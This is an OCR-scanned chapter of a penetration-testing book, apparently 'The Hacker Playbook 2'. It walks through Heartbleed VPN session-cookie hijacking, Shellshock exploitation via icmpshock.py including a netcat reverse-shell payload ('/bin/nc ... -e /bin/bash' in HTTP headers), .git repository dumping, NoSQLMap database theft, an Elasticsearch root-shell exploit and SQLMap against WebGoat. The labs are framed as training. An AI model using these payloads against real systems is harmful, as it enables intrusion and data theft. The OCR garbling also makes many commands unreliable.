Heartbleed check 


What might we see in the output ldap file? If you look closely, we see a SSHA {SSHA} hash. We 
could take that into oclHashcat and crack it. In the same dump, we could have also seen user 
accounts, organizational structure, and private SSL certificates as well. We could have made a copy 
of the private SSL certificate and sniffed all the traffic to that LDAP server. This could mean that we 
would have every user’s account that authenticated against this LDAP server. 
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Heartbleed - LDAP Memory Disclosure 


Now, we know there are tons of different Web and LDAP servers that were vulnerable, but these 
aren’t the only juicy sources of Heartbleed data. One of the largest issues and attacks seen with 
Heartbleed was that it affected SSL VPNs. Imagine for a second that you could read the server’s 
memory on a VPN server. What would be the impact if you could see username and passwords? In 
theory, you would have direct access as any user that was logged in at that time. What if the 
vulnerability was after-hours? Whose account might you compromise? In the case of Heartbleed, as 
many IT administrators VPN’ed in during the rush to patch systems, they could have been getting 
compromised at the same time. 


Let’s take a look at the Juniper SSL VPNs that were vulnerable to this bug. Running the same 
command as before, we query the SSL VPN web server to return what is stored in the designated 
memory space. A result would look like the following: 
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Heartbleed - SSL VPN 
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In this case, the client even had two-factor authentication, but remember how two-factor works with 
SSL VPNs. Once you authenticate with both username/password and token (second factor), you get 
back a web session ID. If you capture just the web session ID, you can impersonate this user now 















(without the second factor) by taking their session ID and importing it into your own browser. For 
example, we see in the heartbleed memory dump a cookie called DSID. What is the DSID? 


“The SA issues an HTTP cookie to authenticate a user session (DSID), which is shared by client 
components (that is, NC/WSAM/Pulse) and the browser. Generally, browsers do not store cookies in 
any secure manner; so it is relatively easy for an attacker to obtain the DSID cookie and gain access 
to an SA session.”{7} 


This is the user’s session cookie! If we grab this cookie and create this cookie in our browser, we 
become this user. So let’s open up Firefox, access the VPN server, select Cookies from the Web 
Developer tab, and view Cookie Information. 


4 ") https ://suck.testlab/dana-na/auth/url_default/welcome.cgi 
)Disable' iCookies" y*"CSS' r |fi|Forms' [^Images' / Information - ' 



Disable Cookies 

Add Cookie... 

Delete Domain Cookies 
Delete Path Cookies 
Delete Session Cookies 



kmsmaas 


ess Service 


Username 

Password 

Realm 


Sign In Help 


Heartbleed - Adding a Cookie 


You might already see two different cookies or the DSID cookie might even be missing. Just add it in 
with the DSID value you obtained from the Heartbleed bug and reload that page. 





▼ 2 cookies 


Name 

Value 

Host 

Path 

Expires 

Secure 

HttpOnly 


©Delete... I ✓ Edit... 


DSSIGNIN 
url.default 
suck.testlab 
/dana-n aJ 

Thu, 31 Dec 2037 00:00:00 GMT 

Yes 

No 




Name 

DSID 

Value 

/ 

Host 

30a4 bff 50aasd fsdf asdf asdf3613334 

Path 

/ 

Expires 

At end of session 

Secure 

Yes 

HttpOnly 

No 




©Delete... I f Edit... 


Heartbleed - Adding the DSID Cookie 


From recent assessments, I don’t really see Heartbleed publicly accessible as when it first came out, 
but I still find it often on internal engagements. 


Shellshock 


Shellshock was the second huge vulnerability in 2014 that caused a multitude of systems to get 
infected all over the Internet. {8} Shellshock was a vulnerability that allowed remote code execution 
due to the fact that Bash has rules for handling the string “() { The vulnerability relied on how 

the system would parse environment strings. Although this didn’t solely affect CGI, due to the fact that 
Bash can parse CGI scripts, this vulnerability is easily attackable. The first part of the exploit string, 
which is really just an environment variable function definition followed by a semi-colon, is written 
as “() { };”• Regardless of what the function definition contains, all we care about is the value we 

inject after the trailing semicolon, which will be parsed and executed by vulnerable versions of Bash. 


Shellshock Lab 


This sounds complex, but the best way to demonstrate shellshock is through an example. This will 
give you a good understanding of how it works. The OWASPBWA vulnerable web application 
virtual machine is vulnerable to the Bash exploit, so make sure you have it running. Log into that VM 
image and copy the vulnerable cgi file listed below first. 


On the OWASPBWA VM Image from a Terminal: 









• wget —no-check-certificate 

https://raw.githubusercontent.com/cheetz/icmpshock/master/test.cgi -O /usr/lib/cgi- 
bin/test.cgi 

• chmod +x/usr/lib/cgi-bin/test.cgi 

• Find the IP of the vulnerable host (ifconfig) 


This will write a shell script to the cgi-bin folder that we need to use to execute the vulnerability. 
Remember for something like Shellshock to work, it needs to have a bash file in the cgi-bin folder. 
You can access it by going to a browser and inputting http://[IP of vulnerable host]/cgi-bin/test.cgi. If 
everything worked, you should see a page that just says “hi”. 


Going back to our attacking Kali host, we are going to use a tool I created called icmpshock.py (note 
that there is also a Metasploit module, so try them all). The reason I created this script is because I 
wanted the tool to brute-force through all common cgi type files at an amazing speed and test all the 
common HTTP header information (User Agent, Cookie, Host, Refer) with ShellShock. As long as 
you have a pretty big pipe, you can take advantage of Python’s threading to brute-force through all cgi 
files/directories in just seconds. Remember that we are going for quick and efficient to try to pop as 
many boxes as possible. 

Now, we go back to our attacking VM host, which you have already configured at the beginning of the 
book, and go to: 

• cd /opt/icmpshock/ 

• chmod +x icmpshock.py 

• gedit target_list.txt and add the vulnerable server's IP 

• Start Up tcpdump to listen for ICMP in a new terminal window. 

o tcpdump -nni ethO -e icmp[icmptype] == 8 

• ./icmpshock.py [Listener IP of the Kali Host] target_list.txt 


This script will brute-force through many different common cgi paths and filenames. If it successfully 
identifies a file and that file is a shell script, it will inject the shell shock exploit to force the system 
to ping back to our victim host. This shows that the victim is not only vulnerable, but that we also 
have command execution. 


This is why we set tcpdump to listen to ICMP requests. In the example below, the icmpshock.py 
script is going through its list of cgi location/files and when it hits cgi-bin/test.cgi, it causes the victim 
host to ping our attacker box. 



Attacking Host 

File Edit 


iotii.fik.il :4 tcpdump -mi eth0 -e icmp[icinptype] »« 8 

tepdump: vei wsv output mppiwuw, -v vi -vv iui Ml protocol decode 

listening on etbO, link-type EN1SMB (Ethernet), capture size 65535 bytes 

01:08:40.354113 00:0c:29:72:0c:8c > 00:0c:29:e3:f6:49, ethertype IPv4 ( 0x0800) 

th 98: 192.168.222.130 > 192.168.222.129: ICMP echo request, id 5743, seq 1, 1 

64 


raot^kaLi: /opt/kmp shock 

File Edit View Search Terminal Help 


Hake Sure to Start Your ICMP Listner First | tcpdump -mi eth0 -e icmplicmptyp 
Usage python iernpshock.py <Ustener_IP> <targets_file> 

E.K python icmpshock.py 117,0,0,1 target_Ust.txt 


[*] Listening Address: 192.168.222.129 
NThread Count: 160 


|*)Target Addresses 


» 192.168,222.130 


I'lPress [ENTER] t« sijui 

[+1HTTP CODE 260 > http://192.168.222.130/cqi-bin/test.cqi 
[+JHTTP CODE 209 > http://192.168.222.130/ ' 

:/opt/iciipshock# python icmpshock.py 192.168.222,129 target_list.txt 


ICMP Shock Exploit 














We now know we have command execution and can go back to our script to change the “Command” 
variable to run whatever shell command we want: 

• gedit icmpshock.py 


We won’t get into post exploitation in this section, but the easiest thing to do would be to spawn a 
reverse netcat listener up. Let’s uncomment the code with the bin/nc command and comment the 
original ping comment. 


•icmpshock.py (/opt/icmpshock) - gedit 

File Edit View Search Tools Documents Help 
| | j|g Open v Save ^ ^ Undo ^ m ({j - ^ <r£ 

I# ‘icmpshock.py x l 

'■ " 111 .. .^"" H. . .. 1 ... V “ 

# If we see ICMP packets coming to our machine from the target, we will 
know that the target is vulnerable. 

def getStatus(ourl): 
global LISTENER 




#The first system argument is our own machine, you can set to "localhost 
or "127.0.0.1" unless testing another machine for an ICMP response. 

#This should be the address used to locally run tcpdump. 


#The following variables are defined as headers for our POST request. 


i 


^(Command = “/bin/ping -cl " + LISTENER 

Command = "/bin/nc " + LISTENER + " 4444 -e /bin/bash 1 

L 1 1 yuu UJML 


USER_AGENT = 
Cookie = "() 
Host = "() { 


LU MJJtv Il 

"0 { 

{ > 

); 


J UA ' Ij i yi I H.-LUL U I ULL 

}; " + Command 
+ Command 
Command 


#uncomment this 


ICMP Shock - Enabling a Netcat Listener 


After making modifications to the code, we need to open a new terminal window and set up a listener 
(instead of the ICMP tcpdump setting configured in the prior example) on the attacking host: 

• nc -1 -p 4444 


Run the icmpshock.py tool again and you should get a connection back. To test, we can run a quick 
“list directory contents” command (Is) and we should see the files in that directory. 











Iroot^ka 1 

i:~# nc -l -p 4444 


root@)kau; 

Help 


test.cgi 
whoami 
www-data 




File Edit View Search Terminal 


Hake Sure to Start Your ICMP Listner First | tcpdump -nni e 
Usage | python icmpshoek.py <listener_IP> <targets_file> 
E.X I python icmpshock.py 127.0.0.1 target list.txt 


[^Listening Address: 192.168.222,129 
[*)Thread Count: 100 


Pi Target Addresses 
» 192.168.222.130 


PJPress [ENTER] to start scan- 

[+1HTTP CODE 20G > http://192.168.222.130/ 


ICMP Shock - Exploit 


We have a full shell on all the vulnerable shellshock systems. We aren’t limited to only web-based 
shellshock exploits either, as you can see below: 

• SSH: 


o 


http://resources.infosecinstitute.com/practical-shellshock- 















• DHCP: 


exploitation-part-2/ 


o https://github.com/rapid7/metasploit- 

frame work/blob/master/modules/exploits/unix/ dhcp/bashenvironment. 

• OSX/VMware: 

o https://github.com/rapid7/metasploit- 

fr amework/blob/master/modules/exploits/osx/local/ vmwarebashfunc 

• OpenVPN: 

o http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to- 

shellshock-exploit/ 


Dumping Git Repositories (Kali Linux) 


It is becoming a very common practice for web developers to implement revision control systems for 
their code base. Different examples of these tools are Git, Bazaar, Mercurial and Subversion, but they 
all work relatively the same. A common mistake seen throughout many development environments is 
that developers tend to leave their repositories (repo) publicly accessible. {9} {10} 


As a penetration tester, once a repository is identified via a web scanner, the common techniques is to 
clone the repository, look for sensitive information in different commits, and restore older versions of 
the applications. As seen in our next example, Git repositories are usually found in a .git directory 
(example: 10.10.10.10/.git/). 


4 1 10.10.10.10/. git/ 

Index of /.git 

• Parent Directory 

• FETCH HEAD 

• HEAD 

• PRIG HEAD 

• branches. 

• config 

• description 

• hooks’ 

• index 

• info . 1 

• logs.’ 

• objects.' 

• packed-refs 

• refs' 

Vulnerable Git Repository 


We can clone the whole remote Git repository onto our Kali Linux host by running a recursive wget 
command from the ./git root (we will assume 10.10.10.10 is the vulnerable server): 























• cd ~ 

• wget -r http://10.10.10.10/.git/ 

• cd 10.10.10.10 


We now have the Git repository cloned onto our local computer and we can run a couple of Git 
commands to pilfer for data. The first command to run is a status command. A status command shows 
you the status of files in the index versus the working directory and can be run by: 

• git status 


# 

deleted: 

images/deselect-arrow.png 

# 

deleted: 

images/disclaimer-dot.png 

# 

deleted: 

images/headerBg.png 

# 

deleted: 

j s/Libs/respond.min.j s 

# 

deleted: 

sec ret.php 

no 

changes added to commit (use "git add" and/or "git commit -a") 
:~/10.10.10. 10# git status 


Git - Deleted Files 


In the status output, we see that in the local revision, secret.php was deleted. To recover the deleted 
change, we can run a git diff command which will generate patch files or statistics of differences 
between paths or files in your git repository. To view the exact changes run the git diff 
commandj 11}: 

• git diff 



diff --git a/sec ret.php b/secret.php 

deleted file mode 100644 

index 77eaa2f..0000000 

*■- a/sec ret.php 

+++ /dev/null 

m -1,162 +0,0 

-<!DOCTYPE html> 

-<!--[if IE 7]> <html class-'no-js ie7 oldie" lang=' 

-<1--[if IE 8]> <html class="no-js ie8 oldie" lang=' 

-<!--[if IE 9]> <html class="no-js ie9 oldie" lang=* 

*<!**[if gt IE 9]><!*-> <html class="noqs" lang= H en"> 
-<head> 

- <meta charset= ll utf-8"> 

- <meta name^"viewport" content="width=device-width"> 

- #Super secret password = "thekeystothekingdom" 


Git - Recovering Passwords 


After running the diff command, we see that the Super secret password was removed. We can also 
recover the whole file by running a command to pull all files from the last commit: 

• git reset —hard 


These same types of techniques can be used to recover data from different types of repositories, but I 
wanted to point out the wealth of data that can be obtained from bad practices and misconfiguration. 


NoSQLmap 

f www.nosqlmap.net/ frKali Linux) 


I will discuss NoSQL further below in the web exploitation section, but with the increasing growth of 
NoSQL databases it is important to know how to interact with them. On numerous tests, scanners will 
find open Mongo/Couch databases with no passwords. I might not have time during the test to go 
through all the data in those databases, so this is where tools provide great value. If you want to 
replicate this specific attack, go into the NoSQL Database Injections section and set up the vulnerable 



Mongo database and associated web application. 


Starting NoSQLmap: 


• cd /opt/NoSQLMap 

• python nosqlmap.py 

• 1 - Set Options 

o Set options for target host IP (your Mongo IP) 
o Set local MongoDB/Shell IP (your IP) 
o b - Save option file 
o x - to Exit 

• 2-NoSQL DB Access Attacks 
Once the attack starts, you should see the following: 

• DB Access attacks (MongoDB) 

• ================= 

• Checking to see if credentials are needed... 

• Successful access with no credentials! 

• MongoDB web management open at http://192.168.199.128:28017. 
authentication required! 

• Start tests for REST Interface (y/n)? y 

• REST interface not enabled. 

• 1-Get Server Version and Platform 

• 2-Enumerate Databases/Collections/Users 

• 3-Check for GridFS 

• 4-Clone a Database 

• 5-Launch Metasploit Exploit for Mongo <2.2.4 

• 6-Return to Main Menu 

• Select an attack: 1 

• Server Info: 

• MongoDB Version: 2.0.6 

• Debugs enabled : False 

• Platform: 32 bit 

• Select an attack: 2 

• List of databases: 

• local 





• admin 

• users 

• appUserData 

• Select an attack: 4 

• Select a database to steal: 5 

• Does this database require credentials (y/n)? n 

• Database cloned. Copy another (y/n)? n 

So, what we effectively did was copy the victim’s Mongo database to our local Mongo instance. We 
can now copy all the databases we have and look at them at a later time for sensitive information. 
How do we look at this data? In our example, we stole the database appUserData and cloned it. In 
our local copy of Mongo, we will see a new database populated called appUserDataf stolen. To 
view it: 

• mongo 

• show dbs 

• use appUserData 

• show collections 

• db.users. fmd() 


> use appUserData 

switched to db appUserData 

> show collections 

system.indexes 

users ’■‘[US QU16t6F VOU D6C0H16 1116 1 

> db,users,find!) 

{ "_id“ : 0 bj ec 11d("54 f 4a7e 4 fc 5c 9a60dd 70 fd11" ], “name" : "James", "username" 
: "james@suck.testlab H } 

{ "_id" : 0bjectI<J("54f4a80&fc5c9a60dd70fdl2"l, “name 11 : "frank", "username" 
: "frank@suck, test lab" ] 

{ " id" : Qbjettld("54f4a8lafc5c9a60dd7efdin, "name" : "paul"* "username" 
"paulIJsuck.testlab" } 


NoSQLMap - Clo nin g 



If you spend some time looking at the power of NoSQLMap, you will also see that there are some 
modules for exploitation. Within the tool, it also integrated a Metasploit exploit module for Mongo 
systems below version 2.2.4. 


Elastic Search (Kali Linux) 


I will say this throughout the book: One of the most important things in becoming a penetration tester 
is understanding a wide breadth of different technologies. Building a lab in your own environment 
with all the different types of servers will help identify what you might run into in the real world. I 
was on an engagement where the vulnerability scanners didn’t find any vulnerabilities for an Elastic 
Search (ES) database. By default, ES has a web application running on port 9200 used for its search 
API. It might have looked something like this: 


[. http://127.0....ch?q=*&pretty X New Tab 


X||# 


• tic hacker.testlab: 9200/ 


•tty 


] Most Visited'-' n Offensive Security Kali Linux V*Kali Docs SjExploit-DB 


“took" : 83, 

"tiBed out" ; false. 

“_shar3s“ : { 

“total" : 1, 

"successful" : 1, 

■failed" : 0 

>. 

"hits" : { 

"total" ! 4936. 

“■ax_score" : 1.0, 

"hits” : [ { 

-_index" : ".■arvel-2015.G3.09". 

-_type" : "node_stats", 

*_id" : "AUv_6aOJAJxlgIsvbP9A", 

"_score" : 1.0, 

"~source" : { 

"@timestamp- : "2015-03-09T19:01:15.975Z", 
"cluster_na«e" : "elasticsearch", 

Elastic Search - Vulnerable search service 


After finding something like this, I instantly knew that 9200 was a port defaulted to Elastic Search, 
and because I monitor security RSS feeds, I remembered that there was a recent vulnerability for it 
f https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ L 

Searching through exploit code, I was able to find one on Xiphos Research 
f https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch L I ran a quick wget on my 
Kali host, connected via the exploit and had a root shell. 









root@kali: /opt 


File Edit View Search Terminal Help 


:/opt# python ./elastic_shell.py elastic.hacker.testlab 



Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1 
{*} Spawning Shell on target... Do note, its only semi-interactive... U 
~$ id 

uid=G(root) gid=0(root) groups=0(root) 

~$ cat /etc/passwd 

root:x:0:0:root:/root:/bin/bash 

daemon:x:1:1:daemon:/us r/sbin:/bin/sh 

bin:x:2:2:bin:/bin:/bin/sh 

sys:x: 3:3:sys:/dev:/bin/sh 

sync:x:4:65534:sync:/bin:/bin/sync 

games:x:5:60:games:/us r/games:/bin/sh 

man:x:6:12:man:/va r/cac he/man:/bin/sh 

l p: x: 7:7 :l p: / va r/spool/lpd:/bin/sh 

mail:x:8:8:mail:/var/mail:/bin/sh 

news:x:9:9:news:/va r/spool/news:/bin/sh 

iuucp:x: 10:10:uucp:/va r/spool/uucp:/bin/sh 

proxy:x:13:13:proxy:/bin:/bin/sh 

jwww-data:x:33:33:www-data:/var/www:/bin/sh 


Elastic Search - Exploit 


Elastic Search Lab: 


If you want to build and test your own vulnerable Elastic Search service, you can install it with the 
following: 

• update-java-alternatives —jre -s java-1.7.0-openjdk-i386 

• wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch- 
1.4.1 .zip 

• unzip elastic search-1.4.1. zip 

• cd elasticsearch-1.4.1/bin/ 

• ./plugin -i elasticsearch/marvel/latest 

• ./elasticsearch 


Once elasticsearch is running, you can download and execute your exploit code: 

• wget 
https://raw.githubusercontent.com/XiphosResearch/exploits/master/ElasticSearch/elas 

• chmod +x ./elasticshell.py 

• python ./elastic shell.py localhost 


And with that, you have compromised another database and obtained access onto a ton of different 
hosts. 


























Summary 


This is a baseline overview on taking the findings from the scanner results and putting them into 
action. These examples will help lead into how to exploit systems in the upcoming chapters. Attacks 
and exploits might not always work, which is why I stress that my readers avoid being tool- 
dependent. It is more important to understand why an attack works and what the underlying issue is, 
so that if a tool fails, you have the ability to modify and fix that exploit. 


What helped me learn how to exploit computers was to take exploits from sites like 
http://www.exploit-db.com/remote/ and recreate them in another high-level scripting language of my 
choice. Developing these types of scripts and testing them against your own servers will help you 
gain a much stronger background in coding and a better understanding for why vulnerabilities work. If 
you are looking to dive deeper into exploit development, I recommend reading The Shellcoder's 
Handbook : 

http://amzn.to/1 QZlgfT . 



The Throw - Manual Web Application Findings 


At this point, you have assessed SUCK’s network, compromised the network scanner vulnerabilities, 
and now you need to move on to web attacks. As more and more companies start to run vulnerability 
scans of their own, I have slowly (slowly) been seeing a trend of the low-hanging service-based 
vulnerabilities going away (like MS08-067). Therefore, the shift to application-based vulnerabilities 
are still an easy target to exploit since most vulnerability scanners either do not provide web 
application testing or do not enable web application scanning because it may break applications or 
take way too long to scan. 

As this book is geared more toward Red Teaming concepts, this book does not go in depth on all the 
different vulnerabilities and how to manually exploit them. This is because a manual web application 
book needs to be very detailed and discuss all the more obscure attacks like CORS (Cross-Origin 
Resource Sharing), SSRF (Server-Side Request Forgery), the various one-off OAuth issues that come 
with misconfiguration of security controls, and others. If you are looking for more information on 
testing all sorts of web type vulnerabilities, you should heavily use these three resources: 

• OWASP Testing Guide 

o http://hit.1y/19GkG5R 

o https://www.owasp.Org/images/l/19/QTGv4.pdf 

• SANS - Securing Web Application Technologies 

o https://www.sans.org/security-resources/posters/securing-web- 

application-technologies-swat-2014-60/download 

• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 

o http: //amzn. to/1 lxZaCv 


Lastly, if you read about Printer Exploitation in The Drive section, that is a great example of how a 
web configuration vulnerability can get you to DA (or at least a domain account). 


Web Application Penetration Testing 


In the initial prep section, we have set up a couple of vulnerable VMs for testing. Since some of this 
section will be based off the OWASP Broken Web Application VM, I highly recommend you set it up 
prior to reading this chapter. You can download the VM here: 

• http://sourceforge.net/projects/owaspbwa/files/ 

Once you download it, you can unzip it and run it in either VMWare or VM Player. Once loaded, grab 
the IP of the virtual machine and open it up in your local browser. It should look something like the 
following: 
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OWASPBWA 


This is one of my favorite web application testing platforms. Definitely spend time learning how to 
break different web applications. 


SLQ Injections 


From either the scanning results or from just poking around, you might be able to identify some SQL 
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full 
compromise of the database or of the system itself. Two open source tools that I have found to work 
most of the time are SQLmap and Sqlninja. Let's go through the process from identification to 
exploitation. 


SOLMap with Burp 

SQLmap is one of my favorite tools to use for finding SQL injections, manipulating database queries, 
and dumping databases. It also has additional functionality to get an interactive shell through an 
injection and can even spawn Meterpreter or a VNC session back to the attacker. 


Before I show you how to use the command line versions of these tools, we will see how integration 
with Burp Proxy Pro also works extremely well. This has saved me from memorizing all of the 
different commands and allowed me to focus on being more efficient and effective. 


Install: 

• Jython2.7beta3 

• http: //www .j ython. org/ downloads .html 

• Download Jython 2.7beta3 - Standalone Jar : For embedding Jython in Java 
applications 

















Extender -> Options -> Python Environment -> Add the location and file of where you download 
Jython: 

• Start Burp with: java -XX:MaxPermSize=lG -jar burpsuite_pro_vl .6. lO.jar 

• Extender -> Options -> Python Environment -> Add the location and file of where 
you download Jython 

• Restart Burp 

• Extender -> BApp Store 

• Select SQLiPy 

• (might as well install HTML5 Auditor, J2EEScan, 002) 

• Restart Burp 


Burp Intruder Repeater Window Heip 

[ Target j Proxy | Spider | Scanner J Intruder j Repeater ] Sequencer j Decoder j Comparer j Extender ] Options | Alert* 
[ Extensions^ BApp Store ] APIs | Options ] 


BApp Store 

The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 


Name 

installed 

Rating 

Detail 


SQLiPy 






Faraday 

Q 

kkkkk 


r 


Google Hack 


++++■;; 



This extension integrates Burp Suite with SQLMap. 

GWT Insertion Points 


irirCrtrk 

Pro extension 



Headers Analyzer 


xxx** 

Pro extension 


Requirements 

Heart Bleed 






MTMIS Auditor 


♦ ★ kkk 

Pro extension 


• Jython 2 7 beta, due to the use of Json. 

Identity Crisis 

LJ 


Pro extension 


• Java 1.7 or 1.8 Ithe beta version of Jython 2.7 requ 

Image Metadata 


***★ 




Issue Poster 


***** 

Pro extension 


• A running instance of the SQLMap API server 

REEScan 


***** 

Pro extension 



JS Beautifier 





SQLMap comes with a RESTful based server that will exi 

JSON Decoder 


itititit 


s. 

manually start the server with 

Loir 

U 

kk k k k 

Pro extension 


python sqlisapapi.py -* -H <ip> -p <port> 

Logger ♦♦ 


***** 




NMAP Parser 


***** 



Alternatively, you can use the SQLMap API tab to select 

Notes 


irkirir:: 



well as the path to python and sqlmapapi.py on your sy 

Payload Parser 


kirkiru 



Once the SQLMap API is running, you just need to right 

Protobuf Decoder 


kirkir. 



of either the Target or Proxy mam tabs and choose 'SQ 

Python Sender 

LJ 

hit kith 



menu. This will populate the SQLMap Scanner tab with i 

Rjndom IP Address Header 


fhHhrt 



Clicking the ‘Start Scan' button will execute a scan. If th 

Reflected Parameters 

□ 

*★★*.•. 

Pro extension 


injection, then these will be added to the Scanner Resul 

Reissue Reguest Scriptcr 


iriririri 




Request Randomizer 


■iririririt 



For more information, see the post here 

Retire.js 

Q 

kit it it it 

Pro extension 



SAML Editor 

□ 

irkirir k 



Author Josh Berry $ Code Watch 

SAMI Encoder / Decoder 


****','.• 



Version: 0.3.8 

Sentinel 

Q 

*★★*. 




Session Auth 


irkirir;: 

Pro extension 


«*»"«= irtrkirb 

Session Timeout Test 

Q 

***** 




Site Map Fetcher 












SQLiPy 

HDH 


Pro extension 
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Burp - SQLiPy 


To use Burp and SQLMap, you start an SQLMap API on your Kali box; meanwhile, Burp Proxy Pro 
can be running anywhere. When Burp finds an SQL injection, it will connect to SQLMap’s running 
API to automatically attack the vulnerable parameters. Let’s now start the SQLMap API listener. 

Start SQLMap API: 

• cd /opt/sqlmap 

• python sqlmapapi.py -s [IP] -p [PORT] 



















rt C i:/opt/sqlnappython sqlraapapi.py -s -H 172,16,151,128 -p 8083 

[01:07:58] [INFO] Running REST-ISON API server at '172.16.§11128:8083' 
[01:07:58] [INFO] Admin ID: 447c0d7228e489f2a350e09434430£® 

[01:07:58] [DEBUG] 1PC database: /tinp/sqlmapipc-cN6Nnt H 
[01:07:58] [DEBUG] REST -JSOM API server connected to IPC djfflase 


SQLMap API 


Burp and SQLMap LAB: 

To demonstrate how to use Burp and SQLMap, we can run a quick demo with the OWBWA VM we 
configured at the beginning. Once loaded, visit [ip]/webgoat.net/Content/SQLInjection.aspx and 
proxy through the Burp tool like we had done with our prior Burp example. 


<4 Meet the FoxyProxy.. * ^ WebGoat.NET * ♦ 

<• / ft 172.16.151.144/ webqoat net/Content/SQLIn|ection.aspx _ 

R3 Most Visited v M Offensive Security \. Kali Linux Kali Docs OExploit-DB It Aircrack-ng 


S'^WE BGOAT.NET 


Injection Attacks Exploiting SOL Injection 

EMPLOYEE EMAIL 

Are you looking to contact one of our employees? L 


Getting Started with ^ 

WebGoat NET 

WebGoat Coins Customer 
Portal 

Injection Attacks 


SQL Error Messages 


Enter the first few letters of their first or last name 


Exploiting SQL Injection 

File Download Path 
Manipulation 

File Upload Path 
Manipulation 

Cross Site Scripting (XSS) 
Authentication Issues 
Testing and Debugging 


Name 


Find Employee 


firstNamelastName email 

Leslie Thompsonlthompson@webgoatcoins com 
Foon Yue Tseng flseng©webgoatcoins com 

Tom King tking@webgoatcoins com 


WebGoat Vulnerable Application 


Make a couple quick searches while proxy’ed through Burp Proxy Pro. In the HTTP history tab, you 
should see the POST request created by the application. Right-click on any request that we want to 
test and run SQLiPy Scan. 











| Target | Proxy ] Spider | 

Scanner ] Intruder j Repeater ] Sequencer ] Decoder ] Comparer J 

Extender ] 

Options , 

Alert. I C02 

F 

| intercept f HTTP history | 

WebSockets history ] Options | 






| Filter Hiding CSS. image and general binary content 

9 a Host 

Method URL 

Params Edited 

Status 

Length 

MIME type 

£**« 

1 http://172.16.1Sl-14X 

1 POST /webgoatnet/Content/SOUniecti 


200 

19993 

HTML 

asp 


'V_ r 

Request^ Response j 


J Request^ Response | 


| Raw | Params } Headers j Hex j ViewState 

Sand to Spider 


POST /vabgoat net/Content/SQLInjection a%px HTTP/1 1 

Hou 172 IS. 1 SI 144 

Uaar-Agant Hozilla/S 0 <X11. Linux ic0£. rv:31.Ol Cacko/20100101 P 
Accept: carc /htnl # applicat lon/xhcal + iral, applicat lon/xal, q«0.9.*/*;q 
Accept-Language: en-US,en.g* 0.& 

Accept-Incoding: grip, deflate 

Referee http //17C 16.161.144/vebgoat net/Content/SQLInjection a%p 
Cookie ASP >2IT_Se««lonIde 3BSC 3BB9£X6RBS&978IB£BCC . Server »b3dhc 3B» 
Connection: keep-alive 

Cone enc-Type: appl lcat ion/ x -wv- tora-ur 1 encoded 

Content-Length: 1340 

Do an active scan 

Do a passive scan 

Send to intruder Ctrl* I 

Send to Repeater Ctrl+R 

Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 

Request in browser k 


_ VIIVSTATE-DAvHlAI AAA4BB.A:A.O.AgAADglPA.4BD PACAAA:A.UTDgKNIAIAAA4 

Send to SQLMapper 

Send to CeWler 

OlAhAXDABDAgl 
pbadUOOf )b 3 J* 

AuHCvgQ 3V*dHVyZTluZXVOcnR«LCB jdVJtaVNLZXlObrt lkj 1 iHxdhHVHlJlJ ISRidR 

Send to Laudanum 


AGCgAAgtrAAg«AAA4BB QAOAQO.AgAAX-oHFA wUCBwit . AvO jAgAAT gKFAAUBB . ICAvO .A / 
dChvb>3xbriAdrViZ:«hdCHvaVlsLaMvbjAAAAAMIAIAAA4DB . AFAaUCDgHHIA I !ff>v« 
adAd:ViZ29hdCMvaVSsLaMvbQAAAAAJfBA!AAA4P8iARAiUCDglOf IA1HDvSCAAABA1Rv 

SQLiPy Scan 

AgcAC.gAAgkAA 
ASIVChx'br-Szb: 

trVMHlbncAAAA 

CDASSAgAAAPZC 

Scan for WSDL Files 

Engagement tools k 


Burp - SQLiPy Scan 


For the first time, we will have to input the SQLMap API IP and Port. We can also select what type 
of data we want to pull. 


I Target Proxy Spider Scanner Intruder i Repeater Sequencer l Oecoder Comparer Extender Options Alerts 


SQLMap API [ SQLMap Scanner ] SQLMap Logs J SQLMap Scan Stop j 


SQLMap API IP 


172 16 1S1 128j 


SQLMap API Port 


URL 


http //172 16 1S1 144 80/webgoat net/Content/SQUnjectlon aspx 


Post Data 


Yl5VSSSXZWJDb2S0cm9scySTb3j0RGlyZWN0aW9uTVN5c3RlbSSXZWlslFZIcnNpb249Ml4wL 

jAuMCwgQ3VsdKvyZTluZXV0cmFsLCBQdWJsaWNlZXlUb2tlb|liMDNmNWY3Z|ExZDUwYTN 

hBQAaG0qAABADAAAAABACAAAA6.ctl00%24BodyContentPlaceholder%24txtName-t6.ctl0 

©%24BodyContentPlaceholder%24btnAdd-Fmd*Employee6._EVENYVALlOATION-GwABA 

AAA%2P%2P%2F%2PX>2FwEAAAAAAAAADwEAAAAEAAAACAZFC0eLh7q7fjlDpSRg5vYLAA%3 
D%306>_EVtNTTARGET—6._EVENTARGUMENT- 


* 

s 


Cookies 


ASP NET_Sessionld-3BDC36896E8FBSS978EB6BCC; Server-b3dhc38id2E- 


Referer 


http7/172 16 1S1.144/webgoat net/Content/SOLIniection aspx 


User-Agent 


Mozilla/S 0 1X11. Linux 1686. rv 31 01 Gecko/20100101 Firefox/31 0 lceweasel/31 4 0 


Test Parameter(s) Q Text Only 


Level ( 3 * Risk ^1 


O Param Pollution 

Q Current User 

fcfl Current DB 

(jfl Hostname 

0 Is 0BA7 

[£ List Users 

\£t List Passwords 

G List Pr»vs 

G List Roles 

2) List DBs 


Burp - SQLMap Scanner Injection 


If an SQL Injection is successful, the Scanner tab will light up 
“SQLMap Scan Finding.” By clicking on this, we will be able to 


and have a new finding called 
get information about the current 














































DB, Hostname, Users, Passwords and databases. 


Burp Intruder Repeater Window Help 
I Target j Proxy j Spider 


Scanner Intruder | Repeater | Sequencer | Decoder | Comparer [ Extend* 


Results Scan queue Live scanning Options 


9 http://172.161Sl.144 


9 SQLMap Scan Finding 

i Email addresses disclosed 
Path-relative style sheet import 


Advisory Request Response | 


Password Hashes per User; 

• wackopicko 

• *5FA5F4C9ACD2CA5C1EB9E0EC80175D5FCAA0D7D6 

• root 

• *73316569DAC7839C2A784FF263F5C0ABBC7086E2 

• kbloom 

• ‘10A99DBC0772291AA6AF9A1A9271945340E4E812 

• stealth 

